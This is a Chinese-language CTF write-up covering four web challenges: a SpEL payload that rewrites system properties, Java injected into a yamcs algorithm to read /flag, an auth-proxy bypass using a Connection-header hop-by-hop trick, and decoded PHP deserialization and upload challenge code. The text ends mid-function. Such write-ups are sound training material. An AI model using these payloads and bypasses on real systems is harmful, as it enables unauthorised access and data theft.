bbjv

先反编译一下

GatewayController.class

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/**
 * REST controller exposing the single {@code /check} endpoint.
 * This is decompiler output: local names such as {@code var7}/{@code var8}/{@code var9}
 * are generated, not the original source names.
 */
@RestController
public class GatewayController {
// Service used to evaluate the user-supplied rule string.
private final EvaluationService evaluationService;

public GatewayController(EvaluationService evaluationService) {
this.evaluationService = evaluationService;
}

/**
 * Evaluates {@code rule} and, when {@code flag.txt} exists in the directory named by the
 * {@code user.home} system property, appends the first line of that file to the response.
 *
 * @param rule request parameter handed unchanged to {@code EvaluationService.evaluate}
 * @return the evaluation result, optionally followed by the flag line as HTML
 * @throws RuntimeException wrapping any {@code IOException} raised while reading the file
 */
@GetMapping({"/check"})
public String checkRule(@RequestParam String rule) throws FileNotFoundException {
// The rule is evaluated first; user.home is only read on the next line, so any change
// the evaluation makes to that system property decides which directory is probed.
String result = this.evaluationService.evaluate(rule);
File flagFile = new File(System.getProperty("user.home"), "flag.txt");
if (flagFile.exists()) {
try {
BufferedReader br = new BufferedReader(new FileReader(flagFile));

// The nested try/catch below closes br on both the normal and the exceptional path
// (it looks like the decompiler's expansion of a try-with-resources statement).
try {
// Only the first line of the file is read.
String content = br.readLine();
result = result + "<br><b>\ud83d\udea9 Flag:</b> " + content;
} catch (Throwable var8) {
try {
br.close();
} catch (Throwable var7) {
// Keep the close() failure attached to the primary exception.
var8.addSuppressed(var7);
}

throw var8;
}

br.close();
} catch (IOException var9) {
throw new RuntimeException(var9);
}
}

return result;
}
}

在/check路由中,会在user.home代表的目录下查找flag.txt,如果存在则读出来

1
File flagFile = new File(System.getProperty("user.home"), "flag.txt");

Dockerfile里可以看到flag的位置是/tmp/flag.txt,因此我们需要让user.home的值为/tmp

另外可以发现/check路由中我们可以传入一个rule参数,作为参数传入到evaluationService类的evaluate方法中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/**
 * Evaluates expression strings with a SpEL parser against the injected evaluation context.
 */
@Service
public class EvaluationService {
// One parser instance reused by every evaluate() call.
private final ExpressionParser parser = new SpelExpressionParser();
// Context the expressions are evaluated against; supplied through the constructor.
private final EvaluationContext context;

public EvaluationService(EvaluationContext context) {
this.context = context;
}

/**
 * Parses {@code expression} in template mode (a {@code TemplateParserContext} is passed to
 * the parser) and evaluates it against the injected context.
 *
 * @param expression the template text to evaluate
 * @return {@code "Result: "} followed by the value, or {@code "Error: "} followed by the
 *         exception message when parsing or evaluation throws
 */
public String evaluate(String expression) {
try {
Object result = this.parser.parseExpression(expression, new TemplateParserContext()).getValue(this.context);
return "Result: " + String.valueOf(result);
} catch (Exception var3) {
// Any failure is reported to the caller as text instead of being propagated.
return "Error: " + var3.getMessage();
}
}
}

可以看到rule会被当作SpEL模板来执行。由于parseExpression的第二个参数传入了TemplateParserContext(默认前缀是 #{,后缀是 }),只有写在 #{...} 里面的内容才会被当作表达式求值,因此传入的模板必须是 #{} 的格式

另外补充一些背景知识

在 SpEL 中,表达式解析和求值的流程可以分为三个关键部分:

  • ExpressionParser:负责将字符串表达式解析为 Expression 对象,类似于“编译器”将代码转为可执行单元。
  • EvaluationContext:提供表达式求值时的上下文环境,包含变量、属性解析器、类型转换器等,类似于“运行时环境”。
  • Expression:表示解析后的表达式对象,负责在特定上下文中计算结果,类似于“可执行的函数”。

但是在SpelConfig类中对表达式求值时的上下文环境EvaluationContext做了限制

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/**
 * Spring configuration that publishes the JVM system properties as a bean and builds the
 * evaluation context used for rule evaluation.
 */
@Configuration
public class SpelConfig {
public SpelConfig() {
}

/**
 * Exposes the object returned by {@code System.getProperties()} itself (no copy is made
 * here), so writes to this bean are writes to the JVM's system properties.
 */
@Bean({"systemProperties"})
public Properties systemProperties() {
return System.getProperties();
}

/**
 * Builds a {@code SimpleEvaluationContext} whose only property accessor is
 * {@code SecurePropertyAccessor} and registers the system properties under the variable
 * name {@code systemProperties}.
 */
@Bean({"restrictedEvalContext"})
public EvaluationContext restrictedEvaluationContext(@Qualifier("systemProperties") Properties systemProperties) {
SimpleEvaluationContext simpleContext = SimpleEvaluationContext.forPropertyAccessors(new PropertyAccessor[]{new SecurePropertyAccessor()}).build();
// Makes the Properties object reachable from expressions as #systemProperties.
simpleContext.setVariable("systemProperties", systemProperties);
return simpleContext;
}
}

SimpleEvaluationContext就是Spring官方专门搞出来的一个受限版SpEL环境,T(java.lang.XXX)这种类型引用,new 构造器表达式,任意方法调用,Bean解析,反射这些全部不允许。

另外结合SecurePropertyAccessor类,可以发现重写了canRead方法始终返回false,禁止了所有属性访问操作

1
2
3
4
5
6
7
8
/**
 * Property accessor that refuses every property read.
 * Only {@code canRead} is overridden in this class; everything else is inherited from
 * {@code ReflectivePropertyAccessor}.
 */
public class SecurePropertyAccessor extends ReflectivePropertyAccessor {
public SecurePropertyAccessor() {
}

/** Always answers {@code false}, regardless of context, target or property name. */
public boolean canRead(EvaluationContext context, Object target, String name) throws AccessException {
return false;
}
}

但是题目给我们留了一个系统属性systemProperties,由于SimpleEvaluationContext仍然允许对Map键值对的索引读写,因此我们可以用Map下标写入的形式去修改系统属性,即便SecurePropertyAccessor把属性访问禁了,它也拦不住我们去改Map里的东西,而user.home又正好是一个系统属性。

因此payload如下,其中 #systemProperties 里的 # 表示引用上下文中通过setVariable注册的变量systemProperties:

1
#{#systemProperties['user.home']='/tmp'}

url编码一下发送即可

1
/check?rule=%23%7B%23systemProperties%5B%27user.home%27%5D%3D%27%2Ftmp%27%7D

yamcs

可以当作一个纯黑盒题来打,其实只要找到哪些能执行代码,哪里能看到代码执行的结果就可以了。

最终发现/algorithms/myproject/copySunsensor/-/summary?c=myproject__realtime里面可以执行代码

默认是执行

1
out0.setFloatValue(in.getEngValue().getFloatValue());

修改为

1
out0.setFloatValue(1);

可以在trace里的Runs看到输出
alt text

那么就知道我们能看到out0的值,后面让AI搓下代码把flag的值用out0带出来即可

一个示例payload

1
2
3
4
5
6
7
8
9
10
11
12
// Reads /flag as UTF-8 text and publishes it through the algorithm output out0.
// The read is wrapped in a Callable submitted to the common ForkJoinPool: call() is
// declared "throws Exception", so the snippet itself needs no try/catch around the file I/O.
out0.setStringValue(
// Callable is used as a raw type, hence the explicit (String) cast on the joined result.
(String) java.util.concurrent.ForkJoinPool.commonPool().submit(
new java.util.concurrent.Callable() {
public Object call() throws Exception {
return new String(
java.nio.file.Files.readAllBytes(java.nio.file.Paths.get("/flag")),
java.nio.charset.StandardCharsets.UTF_8
);
}
}
// join() blocks until the task has finished and yields its return value.
).join()
);

SecretVault

app.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
import base64
import os
import secrets
import sys
from datetime import datetime
from functools import wraps
import requests

from cryptography.fernet import Fernet
from flask import (
Flask,
flash,
g,
jsonify,
make_response,
redirect,
render_template,
request,
url_for,
)
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
import hashlib

db = SQLAlchemy()

class User(db.Model):
    """Account row: unique username, salted password hash, and the vault entries it owns."""

    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    password_hash = db.Column(db.String(128), nullable=False)
    salt = db.Column(db.String(64), nullable=False)
    created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)
    # Deleting a user also deletes the entries that belong to it.
    vault_entries = db.relationship('VaultEntry', backref='user', lazy=True, cascade='all, delete-orphan')


class VaultEntry(db.Model):
    """One stored credential; the password column holds ciphertext text, not the plaintext."""

    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    label = db.Column(db.String(120), nullable=False)
    login = db.Column(db.String(120), nullable=False)
    password_encrypted = db.Column(db.Text, nullable=False)
    notes = db.Column(db.Text)
    created_at = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)

def hash_password(password: str, salt: bytes) -> str:
    """Hash ``password`` with ``salt`` and return the digest as base64 text.

    The input ``salt + password(utf-8)`` is passed through 50 chained SHA-256 rounds;
    the final 32-byte digest is base64-encoded.
    """
    data = salt + password.encode('utf-8')
    for _ in range(50):
        data = hashlib.sha256(data).digest()
    return base64.b64encode(data).decode('utf-8')

def verify_password(password: str, salt_b64: str, digest: str) -> bool:
    """Return True when ``password`` hashes to ``digest`` under the base64-encoded salt."""
    salt = base64.b64decode(salt_b64.encode('utf-8'))
    return hash_password(password, salt) == digest

def generate_salt() -> bytes:
    """Return 16 random bytes from the ``secrets`` module."""
    return secrets.token_bytes(16)

def create_app() -> Flask:
    """Build and configure the Flask application.

    Reads ``DATABASE_URL``, ``SIGN_SERVER`` and ``FERNET_KEY`` from the environment,
    creates the tables, seeds the ``admin`` user (id 0) together with the flag vault
    entry when the user table is empty, and registers all routes.

    Raises:
        RuntimeError: if ``FERNET_KEY`` is not set.
    """
    app = Flask(__name__)
    app.config['SECRET_KEY'] = secrets.token_hex(32)
    app.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL', 'sqlite:///vault.db')
    app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    app.config['SIGN_SERVER'] = os.getenv('SIGN_SERVER', 'http://127.0.0.1:4444/sign')
    fernet_key = os.getenv('FERNET_KEY')
    if not fernet_key:
        raise RuntimeError('Missing FERNET_KEY environment variable. Generate one with `python -c "from cryptography.fernet import Fernet; print(Fernet.generate_key().decode())"`.')
    app.config['FERNET_KEY'] = fernet_key
    db.init_app(app)

    fernet = Fernet(app.config['FERNET_KEY'])
    with app.app_context():
        db.create_all()

        # First start only: create the admin account with a random, never-disclosed
        # password and store the flag as one of its vault entries.
        if not User.query.first():
            salt = secrets.token_bytes(16)
            password = secrets.token_bytes(32).hex()
            password_hash = hash_password(password, salt)
            user = User(
                id=0,
                username='admin',
                password_hash=password_hash,
                salt=base64.b64encode(salt).decode('utf-8'),
            )
            db.session.add(user)
            db.session.commit()

            flag = open('/flag').read().strip()
            flagEntry = VaultEntry(
                user_id=user.id,
                label='flag',
                login='flag',
                password_encrypted=fernet.encrypt(flag.encode('utf-8')).decode('utf-8'),
                notes='This is the flag entry.',
            )
            db.session.add(flagEntry)
            db.session.commit()

    def login_required(view_func):
        """Decorator: resolve the current user from the ``X-User`` header or redirect to login."""
        @wraps(view_func)
        def wrapped(*args, **kwargs):
            # Identity comes solely from the X-User header. When the header is absent
            # the default '0' is used, which is the id of the seeded admin user.
            uid = request.headers.get('X-User', '0')
            print(uid)
            if uid == 'anonymous':
                flash('Please sign in first.', 'warning')
                return redirect(url_for('login'))
            try:
                uid_int = int(uid)
            except (TypeError, ValueError):
                flash('Invalid session. Please sign in again.', 'warning')
                return redirect(url_for('login'))
            user = User.query.filter_by(id=uid_int).first()
            if not user:
                flash('User not found. Please sign in again.', 'warning')
                return redirect(url_for('login'))

            g.current_user = user
            return view_func(*args, **kwargs)

        return wrapped

    @app.route('/')
    def index():
        """Send anonymous visitors to the login page and everyone else to the dashboard."""
        uid = request.headers.get('X-User', '0')
        if not uid or uid == 'anonymous':
            return redirect(url_for('login'))

        return redirect(url_for('dashboard'))

    @app.route('/register', methods=['GET', 'POST'])
    def register():
        """Show the registration form (GET) or create a new user (POST)."""
        if request.method == 'POST':
            username = request.form.get('username', '').strip()
            password = request.form.get('password', '')
            confirm_password = request.form.get('confirm_password', '')
            if not username or not password:
                flash('Username and password are required.', 'danger')
                return render_template('register.html')
            if password != confirm_password:
                flash('Passwords do not match.', 'danger')
                return render_template('register.html')
            salt = generate_salt()
            password_hash = hash_password(password, salt)
            user = User(
                username=username,
                password_hash=password_hash,
                salt=base64.b64encode(salt).decode('utf-8'),
            )
            db.session.add(user)
            try:
                db.session.commit()
            except IntegrityError:
                # The unique constraint on username was violated.
                db.session.rollback()
                flash('Username already exists. Please choose another.', 'warning')
                return render_template('register.html')
            flash('Registration successful. Please sign in.', 'success')
            return redirect(url_for('login'))
        return render_template('register.html')

    @app.route('/login', methods=['GET', 'POST'])
    def login():
        """Check the credentials and, on success, set a token obtained from the sign server."""
        if request.method == 'POST':
            username = request.form.get('username', '').strip()
            password = request.form.get('password', '')
            user = User.query.filter_by(username=username).first()
            if not user or not verify_password(password, user.salt, user.password_hash):
                flash('Invalid username or password.', 'danger')
                return render_template('login.html')
            # The token is issued by the separate sign service for this user's id.
            r = requests.get(app.config['SIGN_SERVER'], params={'uid': user.id}, timeout=5)
            if r.status_code != 200:
                flash('Unable to reach the authentication server. Please try again later.', 'danger')
                return render_template('login.html')

            token = r.text.strip()
            response = make_response(redirect(url_for('dashboard')))
            response.set_cookie(
                'token',
                token,
                httponly=True,
                secure=app.config.get('SESSION_COOKIE_SECURE', False),
                samesite='Lax',
                max_age=12 * 3600,
            )
            return response
        return render_template('login.html')

    @app.route('/logout')
    def logout():
        """Drop the token cookie and return to the login page."""
        response = make_response(redirect(url_for('login')))
        response.delete_cookie('token')
        flash('Signed out.', 'info')
        return response

    @app.route('/dashboard')
    @login_required
    def dashboard():
        """Render the current user's vault entries with their passwords decrypted."""
        user = g.current_user
        entries = [
            {
                'id': entry.id,
                'label': entry.label,
                'login': entry.login,
                'password': fernet.decrypt(entry.password_encrypted.encode('utf-8')).decode('utf-8'),
                'notes': entry.notes,
                'created_at': entry.created_at,
            }
            for entry in user.vault_entries
        ]
        return render_template('dashboard.html', username=user.username, entries=entries)

    @app.route('/passwords/new', methods=['POST'])
    @login_required
    def create_password():
        """Encrypt and store a new vault entry for the current user."""
        user = g.current_user
        label = request.form.get('label', '').strip()
        login_value = request.form.get('login', '').strip()
        password_plain = request.form.get('password', '').strip()
        notes = request.form.get('notes', '').strip() or None
        if not label or not login_value or not password_plain:
            flash('Service name, login, and password are required.', 'danger')
            return redirect(url_for('dashboard'))
        encrypted_password = fernet.encrypt(password_plain.encode('utf-8')).decode('utf-8')
        entry = VaultEntry(
            user_id=user.id,
            label=label,
            login=login_value,
            password_encrypted=encrypted_password,
            notes=notes,
        )
        db.session.add(entry)
        db.session.commit()
        flash('Password entry saved.', 'success')
        return redirect(url_for('dashboard'))

    @app.route('/passwords/<int:entry_id>', methods=['DELETE'])
    @login_required
    def delete_password(entry_id: int):
        """Delete one of the current user's entries; 404 when it is not theirs or missing."""
        user = g.current_user
        entry = VaultEntry.query.filter_by(id=entry_id, user_id=user.id).first()
        if not entry:
            return jsonify({'success': False, 'message': 'Entry not found'}), 404
        db.session.delete(entry)
        db.session.commit()
        return jsonify({'success': True})

    return app


# Script entry point: serve the app on the loopback interface only.
if __name__ == '__main__':
    flask_app = create_app()
    flask_app.run(host='127.0.0.1', port=5000, debug=False)

main.go

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
package main

import (
"crypto/rand"
"encoding/hex"
"fmt"
"log"
"net/http"
"net/http/httputil"
"strings"
"time"

"github.com/golang-jwt/jwt/v5"
"github.com/gorilla/mux"
)

var (
SecretKey = hex.EncodeToString(RandomBytes(32))
)

type AuthClaims struct {
jwt.RegisteredClaims
UID string `json:"uid"`
}

// RandomBytes returns length bytes read from crypto/rand.
// NOTE(review): on a read error it returns nil instead of failing, so a caller that
// hex-encodes the result (as SecretKey does) would silently get an empty string.
func RandomBytes(length int) []byte {
b := make([]byte, length)
if _, err := rand.Read(b); err != nil {
return nil
}
return b
}

// SignToken issues an HS256 JWT for uid, signed with SecretKey.
// uid is stored both in the custom "uid" claim and as the subject; the token is valid
// from now and expires one hour later.
func SignToken(uid string) (string, error) {
t := jwt.NewWithClaims(jwt.SigningMethodHS256, AuthClaims{
UID: uid,
RegisteredClaims: jwt.RegisteredClaims{
Issuer: "Authorizer",
Subject: uid,
ExpiresAt: jwt.NewNumericDate(time.Now().Add(time.Hour)),
IssuedAt: jwt.NewNumericDate(time.Now()),
NotBefore: jwt.NewNumericDate(time.Now()),
},
})
tokenString, err := t.SignedString([]byte(SecretKey))
if err != nil {
return "", err
}
return tokenString, nil
}

// GetUIDFromRequest extracts the uid claim from the request's bearer token.
// The token is taken from the Authorization header, or from the "token" cookie when that
// header is empty. It returns "" whenever no token is present or the token fails to parse
// or validate.
func GetUIDFromRequest(r *http.Request) string {
authHeader := r.Header.Get("Authorization")
if authHeader == "" {
// Fall back to the cookie and normalise it to the "Bearer <token>" form.
cookie, err := r.Cookie("token")
if err == nil {
authHeader = "Bearer " + cookie.Value
} else {
return ""
}
}
// 7 == len("Bearer "): the value must carry something after the prefix.
if len(authHeader) <= 7 || !strings.HasPrefix(authHeader, "Bearer ") {
return ""
}
tokenString := strings.TrimSpace(authHeader[7:])
if tokenString == "" {
return ""
}
token, err := jwt.ParseWithClaims(tokenString, &AuthClaims{}, func(token *jwt.Token) (interface{}, error) {
// Only HMAC-family signing methods are accepted.
if _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {
return nil, fmt.Errorf("unexpected signing method: %v", token.Header["alg"])
}
return []byte(SecretKey), nil
})
if err != nil {
log.Printf("failed to parse token: %v", err)
return ""
}
claims, ok := token.Claims.(*AuthClaims)
if !ok || !token.Valid {
log.Printf("invalid token claims")
return ""
}
return claims.UID
}

// main starts two HTTP servers: the token-signing service on 127.0.0.1:4444 and the
// authorizing reverse proxy on :5555 that forwards every request to 127.0.0.1:5000.
func main() {
// The Director rewrites each proxied request: it resolves the caller's uid from the
// incoming token, removes the client-supplied Authorization, X-User, X-Forwarded-For
// and Cookie headers, and then sets X-User to the uid (or "anonymous").
authorizer := &httputil.ReverseProxy{Director: func(req *http.Request) {
req.URL.Scheme = "http"
req.URL.Host = "127.0.0.1:5000"

uid := GetUIDFromRequest(req)
log.Printf("Request UID: %s, URL: %s", uid, req.URL.String())
req.Header.Del("Authorization")
req.Header.Del("X-User")
req.Header.Del("X-Forwarded-For")
req.Header.Del("Cookie")

// NOTE(review): per golang/go issue 50580 the proxy strips headers named in the
// request's Connection header after the Director has run, so an X-User set here can
// still be removed before the request is forwarded.
if uid == "" {
req.Header.Set("X-User", "anonymous")
} else {
req.Header.Set("X-User", uid)
}
}}

signRouter := mux.NewRouter()
signRouter.HandleFunc("/sign", func(w http.ResponseWriter, r *http.Request) {
// NOTE(review): there is no return after the 403, so a non-loopback caller would
// still fall through to token signing below.
if !strings.HasPrefix(r.RemoteAddr, "127.0.0.1:") {
http.Error(w, "Forbidden", http.StatusForbidden)
}
// uid comes straight from the query string and is signed as given.
uid := r.URL.Query().Get("uid")
token, err := SignToken(uid)
if err != nil {
log.Printf("Failed to sign token: %v", err)
http.Error(w, "Failed to generate token", http.StatusInternalServerError)
return
}
w.Write([]byte(token))
}).Methods("GET")

log.Println("Sign service is running at 127.0.0.1:4444")
// The sign service runs in its own goroutine so the proxy can block the main one.
go func() {
if err := http.ListenAndServe("127.0.0.1:4444", signRouter); err != nil {
log.Fatal(err)
}
}()

log.Println("Authorizer middleware service is running at :5555")
if err := http.ListenAndServe(":5555", authorizer); err != nil {
log.Fatal(err)
}
}

可以发现程序初始化的时候会把flag放到admin用户的信息里,并且只要以admin身份登录后就可以在/dashboard看到flag。我们重点关注登录的鉴权逻辑,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
def login_required(view_func):
    """Decorator: resolve the current user from the ``X-User`` header or redirect to login."""
    @wraps(view_func)
    def wrapped(*args, **kwargs):
        # A missing X-User header falls back to '0'.
        uid = request.headers.get('X-User', '0')
        print(uid)
        if uid == 'anonymous':
            flash('Please sign in first.', 'warning')
            return redirect(url_for('login'))
        try:
            uid_int = int(uid)
        except (TypeError, ValueError):
            flash('Invalid session. Please sign in again.', 'warning')
            return redirect(url_for('login'))
        user = User.query.filter_by(id=uid_int).first()
        if not user:
            flash('User not found. Please sign in again.', 'warning')
            return redirect(url_for('login'))
        g.current_user = user
        return view_func(*args, **kwargs)
    return wrapped

可以发现Flask每次请求时,都会从HTTP请求头中取出X-User,如果没有就默认是0,正好前面可以看到admin用户的uid就是0,但是没有那么简单,因为从main.go里面可以看到5555端口是有一个Authorizer middleware,而从docker-compose.yml里可以看出docker内部实际转发出的端口就是5555,因此我们的请求是首先到5555端口,然后才被转发到5000端口的python服务。因此只要我们能保证在请求到达python服务时请求头里面没有X-User即可。

接下来看看main.go里面是怎么处理的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
func main() {
authorizer := &httputil.ReverseProxy{Director: func(req *http.Request) {
req.URL.Scheme = "http"
req.URL.Host = "127.0.0.1:5000"

uid := GetUIDFromRequest(req)
log.Printf("Request UID: %s, URL: %s", uid, req.URL.String())
req.Header.Del("Authorization")
req.Header.Del("X-User")
req.Header.Del("X-Forwarded-For")
req.Header.Del("Cookie")

if uid == "" {
req.Header.Set("X-User", "anonymous")
} else {
req.Header.Set("X-User", uid)
}
}}

可以看到如果uid为空,会设置X-User为anonymous,否则设为uid,因为我们不知道admin用户的密码并且无法伪造jwt,所以这样一来怎么都不可能让X-User为0

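这里最终的解决办法是用到了一个trick:把 X-User 写进请求的 Connection 头里(例如 Connection: close, X-User)。Go 的 ReverseProxy 会先执行 Director(此时 X-User 已经被设置成 anonymous),之后才按照 Connection 头删除其中列出的逐跳(hop-by-hop)请求头,于是 X-User 在转发之前又被删掉了。Flask 收到的请求里没有 X-User,就会使用默认值 0。
Connection 头里列出的是只对当前连接有效的选项(connection-specific options),代理(proxy)不能把这些请求头转发到后续的连接中。具体可参考https://github.com/golang/go/issues/50580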

使用hackbar可以轻松完成
alt text

ezphp

1
<?=eval(base64_decode('ZnVuY3Rpb24gZ2VuZXJhdGVSYW5kb21TdHJpbmcoJGxlbmd0aCA9IDgpeyRjaGFyYWN0ZXJzID0gJ2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6JzskcmFuZG9tU3RyaW5nID0gJyc7Zm9yICgkaSA9IDA7ICRpIDwgJGxlbmd0aDsgJGkrKykgeyRyID0gcmFuZCgwLCBzdHJsZW4oJGNoYXJhY3RlcnMpIC0gMSk7JHJhbmRvbVN0cmluZyAuPSAkY2hhcmFjdGVyc1skcl07fXJldHVybiAkcmFuZG9tU3RyaW5nO31kYXRlX2RlZmF1bHRfdGltZXpvbmVfc2V0KCdBc2lhL1NoYW5naGFpJyk7Y2xhc3MgdGVzdHtwdWJsaWMgJHJlYWRmbGFnO3B1YmxpYyAkZjtwdWJsaWMgJGtleTtwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoKXskdGhpcy0+cmVhZGZsYWcgPSBuZXcgY2xhc3Mge3B1YmxpYyBmdW5jdGlvbiBfX2NvbnN0cnVjdCgpe2lmIChpc3NldCgkX0ZJTEVTWydmaWxlJ10pICYmICRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA9PSAwKSB7JHRpbWUgPSBkYXRlKCdIaScpOyRmaWxlbmFtZSA9ICRHTE9CQUxTWydmaWxlbmFtZSddOyRzZWVkID0gJHRpbWUgLiBpbnR2YWwoJGZpbGVuYW1lKTttdF9zcmFuZCgkc2VlZCk7JHVwbG9hZERpciA9ICd1cGxvYWRzLyc7JGZpbGVzID0gZ2xvYigkdXBsb2FkRGlyIC4gJyonKTtmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpIHtpZiAoaXNfZmlsZSgkZmlsZSkpIHVubGluaygkZmlsZSk7fSRyYW5kb21TdHIgPSBnZW5lcmF0ZVJhbmRvbVN0cmluZyg4KTskbmV3RmlsZW5hbWUgPSAkdGltZSAuICcuJyAuICRyYW5kb21TdHIgLiAnLicgLiAnanBnJzskR0xPQkFMU1snZmlsZSddID0gJG5ld0ZpbGVuYW1lOyR1cGxvYWRlZEZpbGUgPSAkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ107JHVwbG9hZFBhdGggPSAkdXBsb2FkRGlyIC4gJG5ld0ZpbGVuYW1lOyBpZiAoc3lzdGVtKCJjcCAiLiR1cGxvYWRlZEZpbGUuIiAiLiAkdXBsb2FkUGF0aCkpIHtlY2hvICJzdWNjZXNzIHVwbG9hZCEiO30gZWxzZSB7ZWNobyAiZXJyb3IiO319fXB1YmxpYyBmdW5jdGlvbiBfX3dha2V1cCgpe3BocGluZm8oKTt9cHVibGljIGZ1bmN0aW9uIHJlYWRmbGFnKCl7ZnVuY3Rpb24gcmVhZGZsYWcoKXtpZiAoaXNzZXQoJEdMT0JBTFNbJ2ZpbGUnXSkpIHskZmlsZSA9ICRHTE9CQUxTWydmaWxlJ107JGZpbGUgPSBiYXNlbmFtZSgkZmlsZSk7aWYgKHByZWdfbWF0Y2goJy86XC9cLy8nLCAkZmlsZSkpZGllKCJlcnJvciIpOyRmaWxlX2NvbnRlbnQgPSBmaWxlX2dldF9jb250ZW50cygidXBsb2Fkcy8iIC4gJGZpbGUpO2lmIChwcmVnX21hdGNoKCcvPFw/fFw6XC9cL3xwaHxcP1w9L2knLCAkZmlsZV9jb250ZW50KSkge2RpZSgiSWxsZWdhbCBjb250ZW50IGRldGVjdGVkIGluIHRoZSBmaWxlLiIpO31pbmNsdWRlKCJ1cGxvYWRzLyIgLiAkZmlsZSk7fX19fTt9cHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKXskZnVuYyA9ICR0aGlzLT5mOyRHTE9CQUxTWydmaWxlbmFtZSddID0gJHRoaXMtPnJlY
WRmbGFnO2lmICgkdGhpcy0+a2V5ID09ICdjbGFzcycpbmV3ICRmdW5jKCk7ZWxzZSBpZiAoJHRoaXMtPmtleSA9PSAnZnVuYycpIHskZnVuYygpO30gZWxzZSB7aGlnaGxpZ2h0X2ZpbGUoJ2luZGV4LnBocCcpO319fSRzZXIgPSBpc3NldCgkX0dFVFsnbGFuZCddKSA/ICRfR0VUWydsYW5kJ10gOiAnTzo0OiJ0ZXN0IjpOJztAdW5zZXJpYWxpemUoJHNlcik7'));

index.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
// Returns $length lowercase letters, each picked with rand() from a-z.
// The output is fully determined by the current state of the random generator.
function generateRandomString($length = 8) {
$characters = 'abcdefghijklmnopqrstuvwxyz';
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$r = rand(0, strlen($characters) - 1);
$randomString .= $characters[$r];
}
return $randomString;
}

date_default_timezone_set('Asia/Shanghai');

// Deserialization target. The destructor dispatches on $key: it instantiates $f as a class
// name, calls $f as a callable, or just prints the source.
class test {
public $readflag;
public $f;
public $key;

// Creating a test object instantiates an anonymous class, whose own constructor handles
// the file upload.
public function __construct() {
$this->readflag = new class {
// Upload handler: runs only when a file was uploaded without error.
public function __construct() {
if (isset($_FILES['file']) && $_FILES['file']['error'] == 0) {
// The seed is the current HHMM followed by the integer value of the global 'filename'.
$time = date('Hi');
$filename = $GLOBALS['filename'];
$seed = $time . intval($filename);
mt_srand($seed);
$uploadDir = 'uploads/';
// Every existing file in uploads/ is removed before the new one is stored.
$files = glob($uploadDir . '*');
foreach ($files as $file) {
if (is_file($file)) {
unlink($file);
}
}
// Stored name: HHMM.<8 generated letters>.jpg; it is also published in $GLOBALS['file'].
$randomStr = generateRandomString(8);
$newFilename = $time . '.' . $randomStr . '.' . 'jpg';
$GLOBALS['file'] = $newFilename;
$uploadedFile = $_FILES['file']['tmp_name'];
$uploadPath = $uploadDir . $newFilename;
if (system("cp " . $uploadedFile . " " . $uploadPath)) {
echo "success upload!";
} else {
echo "error";
}
}
}

public function __wakeup() {
phpinfo();
}

// Calling this method declares a function readflag() (nested declaration); the
// function does not exist until this method has been executed once.
public function readflag() {
function readflag() {
if (isset($GLOBALS['file'])) {
$file = $GLOBALS['file'];
$file = basename($file);
if (preg_match('/:\/\//', $file)) {
die("error");
}
// The file content is screened for "<?", "://", "ph" and "?=" (case-insensitive)
// before the same path is passed to include().
$file_content = file_get_contents("uploads/" . $file);
if (preg_match('/<\?|\:\/\/|ph|\?\=/i', $file_content)) {
die("Illegal content detected in the file.");
}
include("uploads/" . $file);
}
}
}
};
}

// Runs when the object is destroyed, including objects created by unserialize().
public function __destruct() {
$func = $this->f;
// The readflag property is copied into the global that the upload handler uses as seed input.
